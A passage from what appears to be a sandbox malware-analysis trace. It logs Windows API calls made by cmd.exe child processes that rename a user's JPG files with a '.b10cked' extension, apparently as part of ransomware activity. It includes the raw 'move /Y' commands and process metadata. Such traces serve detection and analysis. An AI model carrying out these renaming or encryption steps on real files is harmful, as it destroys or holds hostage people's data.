lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.810] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegCloseKey (hKey=0x40) returned 0x0 [0144.811] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ea0c | out: phkResult=0x12ea0c*=0x40) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x40, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x1, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x0, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x4, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x4) 
returned 0x0 [0144.811] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ea14, lpData=0x12ea18, lpcbData=0x12ea10*=0x1000 | out: lpType=0x12ea14*=0x0, lpData=0x12ea18*=0x9, lpcbData=0x12ea10*=0x1000) returned 0x2 [0144.811] RegCloseKey (hKey=0x40) returned 0x0 [0144.811] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886373 [0144.811] srand (_Seed=0x5b886373) [0144.811] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"" [0144.811] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked\"" [0144.811] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.811] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x171968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0144.811] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0144.812] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0144.812] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.812] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0144.812] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0144.812] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0144.812] _wcsicmp 
(_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0144.812] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0144.812] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0144.812] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0144.812] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0144.812] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0144.812] GetEnvironmentStringsW () returned 0x172358* [0144.812] FreeEnvironmentStringsW (penv=0x172358) returned 1 [0144.812] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.812] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0144.812] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0144.812] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0144.812] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0144.812] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0144.812] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0144.812] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0144.812] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0144.812] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0144.812] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.812] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7d8, lpFilePart=0x12f7d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7d4*="Desktop") returned 0x18 [0144.812] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.813] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) 
returned 0x1709e8 [0144.813] FindClose (in: hFindFile=0x1709e8 | out: hFindFile=0x1709e8) returned 1 [0144.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x1709e8 [0144.813] FindClose (in: hFindFile=0x1709e8 | out: hFindFile=0x1709e8) returned 1 [0144.813] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f554 | out: lpFindFileData=0x12f554) returned 0x1709e8 [0144.813] FindClose (in: hFindFile=0x1709e8 | out: hFindFile=0x1709e8) returned 1 [0144.813] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0144.813] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0144.813] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0144.813] GetEnvironmentStringsW () returned 0x170208* [0144.813] FreeEnvironmentStringsW (penv=0x170208) returned 1 [0144.813] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.814] GetConsoleOutputCP () returned 0x1b5 [0144.814] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.814] GetUserDefaultLCID () returned 0x409 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f918, cchData=128 | out: lpLCData="0") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f918, cchData=128 | out: lpLCData="1") returned 2 [0144.814] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0144.814] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0144.815] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0144.815] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0144.815] GetConsoleTitleW (in: lpConsoleTitle=0x160928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.816] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0144.816] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0144.816] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0144.816] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0144.816] _wcsicmp (_String1="move", _String2=")") returned 68 [0144.816] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0144.816] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0144.816] _wcsicmp (_String1="IF", _String2="move") returned -4 [0144.816] _wcsicmp (_String1="IF/?", 
_String2="move") returned -4 [0144.817] _wcsicmp (_String1="REM", _String2="move") returned 5 [0144.817] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0144.820] GetConsoleTitleW (in: lpConsoleTitle=0x12f610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0144.820] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0144.820] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0144.820] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0144.820] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0144.820] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0144.820] _wcsicmp (_String1="move", _String2="CD") returned 10 [0144.820] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0144.820] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0144.820] _wcsicmp (_String1="move", _String2="REN") returned -5 [0144.820] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0144.820] _wcsicmp (_String1="move", _String2="SET") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0144.821] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0144.821] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0144.821] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0144.821] _wcsicmp (_String1="move", _String2="MD") returned 11 [0144.821] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0144.821] _wcsicmp (_String1="move", _String2="RD") returned -5 [0144.821] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0144.821] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0144.821] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0144.821] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0144.821] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0144.821] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0144.821] _wcsicmp 
(_String1="move", _String2="VER") returned -9 [0144.821] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0144.821] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0144.821] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0144.821] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0144.821] _wcsicmp (_String1="move", _String2="START") returned -6 [0144.821] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0144.821] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0144.821] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0144.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0144.823] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f3cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0144.823] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0144.823] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0144.823] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 
[0144.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0144.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0144.825] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0144.825] _wcsnicmp 
(_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0144.825] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0144.825] _wcsicmp (_String1="QGVEFX~1.JPG", _String2=".") returned 67 [0144.825] _wcsicmp (_String1="QGVEFX~1.JPG", _String2="..") returned 67 [0144.825] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefx~1.jpg")) returned 0x20 [0144.826] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x171f10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0144.826] SetErrorMode (uMode=0x0) returned 0x0 [0144.826] SetErrorMode (uMode=0x1) returned 0x0 [0144.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", nBufferLength=0x104, lpBuffer=0x12ed54, lpFilePart=0x12ed3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", lpFilePart=0x12ed3c*="QGVEFX~1.JPG") returned 0x38 [0144.826] SetErrorMode (uMode=0x0) returned 0x1 [0144.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1")) returned 0x12 [0144.826] _wcsicmp (_String1="QGVEFX~1.JPG", _String2=".") returned 67 [0144.826] _wcsicmp (_String1="QGVEFX~1.JPG", _String2="..") returned 67 [0144.826] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefx~1.jpg")) returned 0x20 [0144.826] SetErrorMode (uMode=0x0) returned 0x0 [0144.826] SetErrorMode (uMode=0x1) returned 0x0 [0144.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", nBufferLength=0x104, lpBuffer=0x12f1d0, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", lpFilePart=0x12ef68*="QGVEFX~1.JPG") returned 0x38 
[0144.826] SetErrorMode (uMode=0x0) returned 0x1 [0144.827] SetErrorMode (uMode=0x0) returned 0x0 [0144.827] SetErrorMode (uMode=0x1) returned 0x0 [0144.827] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x12f3d8, lpFilePart=0x12ef68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", lpFilePart=0x12ef68*="qgVefxhoS8T3s19q574.jpg.b10cked") returned 0x4b [0144.827] SetErrorMode (uMode=0x0) returned 0x1 [0144.827] SetLastError (dwErrCode=0x0) [0144.827] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg.b10cked")) returned 0xffffffff [0144.827] GetLastError () returned 0x2 [0144.827] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x12e8e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e8e4) returned 0x172120 [0144.827] FindNextFileW (in: hFindFile=0x172120, lpFindFileData=0x12e8e4 | out: lpFindFileData=0x12e8e4) returned 0 [0144.828] GetLastError () returned 0x12 [0144.828] FindClose (in: hFindFile=0x172120 | out: hFindFile=0x172120) returned 1 [0144.829] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\QGVEFX~1.JPG", fInfoLevelId=0x1, lpFindFileData=0x171cb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x171cb0) returned 0x172120 [0144.829] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked", lpFilePart=0x0) returned 0x4b [0144.829] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg", nBufferLength=0x104, lpBuffer=0x12eb7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg", lpFilePart=0x0) returned 0x43 [0144.829] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg")) returned 0x20 [0144.829] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg"), lpNewFileName="C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\qgVefxhoS8T3s19q574.jpg.b10cked" (normalized: "c:\\users\\eebsym5\\pictures\\lr0ar2~1\\j4m1cx~1\\qgvefxhos8t3s19q574.jpg.b10cked"), dwFlags=0x3) returned 1 [0144.830] FindClose (in: hFindFile=0x172120 | out: hFindFile=0x172120) returned 1 [0144.830] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12eb30 | out: _Buffer=" 1") returned 9 [0144.830] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.830] GetFileType (hFile=0x7) returned 0x2 [0144.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0144.968] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12eabc | out: lpMode=0x12eabc) returned 1 [0144.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.968] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12eaf0 | out: lpConsoleScreenBufferInfo=0x12eaf0) returned 1 [0144.968] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0144.969] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12eb30 | out: lpBuffer=" 1 file(s) 
moved.\r\n") returned 0x1a [0144.969] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12eb14, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12eb14*=0x1a) returned 1 [0144.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.969] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0144.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0144.969] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0144.970] _get_osfhandle (_FileHandle=0) returned 0x3 [0144.970] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0144.970] SetConsoleInputExeNameW () returned 0x1 [0144.970] GetConsoleOutputCP () returned 0x1b5 [0144.970] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0144.970] SetThreadUILanguage (LangId=0x0) returned 0x409 [0144.970] exit (_Code=0) Process: id = "195" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16660" os_pid = "0x88c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\U8SH0R~1.JPG\" \"C:\\Users\\EEBsYm5\\Pictures\\LR0AR2~1\\J4M1CX~1\\u8sH0rXco9.jpg.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 17170 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000010000" filename = "" Region: id = 17171 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 17172 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 17173 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17174 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 17175 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 17176 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 